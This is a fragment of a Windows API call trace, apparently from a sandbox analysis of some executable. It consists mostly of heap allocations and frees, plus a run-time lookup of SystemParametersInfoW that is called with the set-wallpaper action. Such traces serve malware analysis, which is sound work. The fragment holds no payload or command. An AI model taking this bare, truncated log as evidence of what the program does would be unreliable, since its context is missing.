RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0293.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0293.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0293.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0293.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0293.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0293.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0293.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0293.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0293.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0293.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0293.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0293.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0293.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0293.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0293.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0293.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0293.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0293.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0293.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0293.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0293.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0293.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0293.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0293.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0293.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0293.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0293.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0293.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.304] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0293.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0293.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69ba8 [0293.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69ba8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0293.305] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0293.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0293.306] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0293.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0293.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0293.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0293.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0293.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0293.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0293.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0293.384] FreeLibrary (hLibModule=0x750c0000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0293.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0293.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0293.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0293.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0293.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0293.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0293.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0293.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0293.385] HeapFree (in: hHeap=0x970000, 